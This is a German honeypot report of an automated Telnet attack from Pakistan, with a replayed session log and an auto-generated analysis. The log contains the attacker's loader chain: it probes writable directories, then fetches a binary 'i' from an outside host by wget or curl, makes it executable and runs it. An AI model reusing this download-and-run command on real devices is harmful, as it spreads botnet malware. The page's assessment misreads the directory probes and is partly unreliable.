ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Pakistan: BusyBox-Ausbruch und Ausbruch in eine Shell

01.10.2026, 11:50 UTC · 12 Befehle · über telnet · Pakistan · 3× wiederholt

Überblick

Dienst
telnet (Port 23)
Herkunft
Pakistan · National Telecommunication Corporation
Probierte Zugangsdaten
/ root
Gleiche Sitzung gesehen
3×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ 1111
bash: 1111: command not found
root@srv01:~$ start
bash: start: command not found
root@srv01:~$ enable
bash: enable: command not found
root@srv01:~$ config terminal
bash: config: command not found
root@srv01:~$ system
bash: system: command not found
root@srv01:~$ linuxshell
bash: linuxshell: command not found
root@srv01:~$ su
su: must be run from a terminal
root@srv01:~$ shell
bash: shell: command not found
root@srv01:~$ sh
root@srv01:~$ >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x47\x44\x46\x54\x4d\x59'
bash: /var/run/.x: Permission denied
GDFTMY
root@srv01:~$ /bin/busybox wget;/bin/busybox echo -ne '\x47\x44\x46\x54\x4d\x59'
wget: missing URL
Usage: wget [OPTIONS]... [URL]...
GDFTMY
root@srv01:~$ >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://[IP]:36307/i ||curl -O http://[IP]:36307/i ||/bin/busybox wget http://[IP]:36307/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x52\x4f\x5a\x48\x48\x55\x56\x58'
rm: cannot remove 'i': No such file or directory
Connecting to [IP]:59751... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4096 (4.0K) [application/octet-stream]
Saving to: 'i'
     0K ....                                                100%  2.34M=0s
2023-10-27 14:32:10 (2.34 MB/s) - 'i' saved [4096/4096]
bash: ./i: Permission denied
XXCZY LJ
ROZHHUVX

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer verbindet sich über Telnet mit Standardzugangsdaten und versucht, eine privilegierte Shell-Umgebung zu starten. Nach fehlgeschlagenen Versuchen, in ein Linux-Subsystem zu wechseln, leert er mehrere temporäre Verzeichnisse. Anschließend versucht er, eine Datei namens 'i' von einem externen Server herunterzuladen und ausführbar zu machen.

Was die Befehle bewirken

Die ersten Kommandos wie 'enable' und 'config terminal' sind Cisco-Befehle, die hier auf einem Linux-System scheitern. Der Befehl 'su' scheitert, da keine interaktive Terminalverbindung vorliegt. Die langen Zeilen mit '>/var/run/.x' leeren Dateien in verschiedenen Verzeichnissen, um Speicherplatz zu schaffen oder alte Spuren zu löschen. Der eigentliche Angriff erfolgt durch 'wget' oder 'curl', die eine Datei vom externen Server laden. 'chmod 777' setzt alle Rechte für diese Datei, um sie ausführen zu können.

Worauf es hinauslief

Das Ziel ist die Installation einer Schadsoftware, vermutlich eines Botnet-Agents oder Kryptominers, auf dem Gerät. Dies erkennt man an der typischen Struktur des Download-Befehls und dem Versuch, die Datei in verschiedenen Schreibpfaden zu speichern. Die wiederholten Verbindungen deuten auf automatisierte Skripte hin, die nach verwundbaren Geräten suchen.

Einordnung

Dies ist ein sehr verbreiteter, automatisierter Angriff auf IoT-Geräte mit Standardpasswörtern. Die Verwendung von BusyBox und einfachen Download-Skripten ist charakteristisch für Masseninfektionen durch bekannte Malware-Familien.